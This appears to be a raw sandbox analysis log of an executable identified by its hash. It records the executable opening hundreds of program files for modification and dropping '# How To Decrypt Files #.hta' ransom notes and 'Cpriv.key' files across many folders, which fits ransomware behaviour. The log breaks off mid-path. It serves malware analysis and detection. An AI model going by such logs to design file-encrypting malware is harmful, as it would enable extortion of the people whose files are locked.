de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\MSB1ENFR.ITS de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0101858.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-threaddump_ja.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Civic.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0090070.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\viewDblClick.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Push\NavigationRight_ButtonGraphic.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.ui.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287415.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\MYSL.ICO de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BZCARDHM.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\VisualElements\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\AG00038_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0186364.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\DGWEBSBR.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Part\2 Top.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe AIR\Versions\1.0\Adobe AIR Application Installer.swf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00735_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR15F.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0185776.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\SpringGreen\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\BROCHURE.DPV de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.bmp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\License.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector.nl_ja_4.4.0.v20140623020002.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-enumerations.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\46.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\ink\en-US\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Locales\bn.pak de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-options-api.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\MediaCenter.Gadget\en-US\gadget.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Skins\Revert.wmz de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\images\combo-hover-middle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\ICE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02793_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0301252.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Wordcnvpxy.cnv de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_decreaseindent.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_gray_snow.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE01191_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PH02754U.BMP de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\HTECH_01.MID de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\EXCEL_COL.HXT de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\System\ado\adojavas.inc de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\DD01166_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolIcons\SpaceSelector.ico de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\plugin2\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\en-US\calendar.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\Adobe\Updater6\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\VGX\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\en-US\js\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\content-foreground.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Sync Framework\v1.0\Documentation\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Google\Chrome\Application\81.0.4044.129\Extensions\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\grayStateIcon.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0221903.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Templates\1033\Access\Tasks.accdt de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-favorites.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\settings_divider_left.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\EmptyDatabase.zip de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\PROPLUS\ProPlusWW.XML de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\db\bin\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaBrightRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Flow.thmx de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10336_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30B.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\access_output\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_divider_right.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\THMBNAIL.PNG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Reference Assemblies\Microsoft\Framework\v3.0\RedistList\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\120DPI\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\VSTA\AppInfoDocument\AddIns.store de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\39.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_GreenTea.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\en-US\css\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0287644.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00726_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO01905_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPrintTemplate.html de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\en-US\js\localizedStrings.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\images\triangle.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console_1.0.300.v20131113-1212.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\PUBWIZ\NAVBRPH1.POC de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Search5.api de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO02617_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\button_mid.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0177257.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE02169_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Elemental.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21308_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\OFFICE14\Office Setup Controller\Excel.en-us de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-application.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0174635.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\utilityfunctions.js de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\pause_rest.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_sun.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_left_hover.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\CAPSULES\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\bod_r.TTF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SL00345_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Solutions\gradient.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\bg_VelvetRose.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\vlc16x16.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_pt_BR.properties de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansRegular.ttf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Stationery\1033\PINELUMB.HTM de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\WB01742_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Document Themes 14\Theme Colors\Clarity.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_search_over_BIDI.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\SO00671_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21534_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\PE00685_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\GrayCheck\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\AddToViewArrow.jpg de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Swirl\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_up.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-waxing-gibbous.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\FD00382_.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-io-ui.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Common Files\microsoft shared\Help\1028\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10337_.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FieldTypePreview\TEXTAREA.JPG de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\THEMES14\STRTEDGE\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\MEDIA\CAGCAT10\J0293234.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.ja_5.5.0.165303.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Certificates\groove.net\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Microsoft Office\Office14\Groove\Sounds\Things\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-modules-profiler.xml de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\Office14\1033\GrooveForms5\bg_Groove.gif de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0239079.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\Publisher\Backgrounds\J0143750.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\DVD Maker\Shared\DvdStyles\Rectangles\15x15dot.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\plugin.jar de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0099193.GIF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\locale\da\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files\Microsoft Office\CLIPART\PUB60COR\J0105386.WMF de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\VideoLAN\VLC\plugins\control\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\DefaultID.pdf de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.SYX de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\novelty_s.png de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Common Files\Microsoft Shared\ink\it-IT\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.flightrecorder_5.5.0.165303\Cpriv.key de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows Media Player\Media Renderer\# How To Decrypt Files #.hta de8a4978d6541c3abc958757d9fb3909c6cd58447a67877177c3434cb7438e2e.exe File created C:\Program Files (x86)\Windows 